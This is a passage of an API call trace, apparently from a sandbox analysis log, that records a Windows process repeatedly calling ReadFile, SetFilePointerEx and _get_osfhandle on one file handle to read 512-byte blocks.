dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
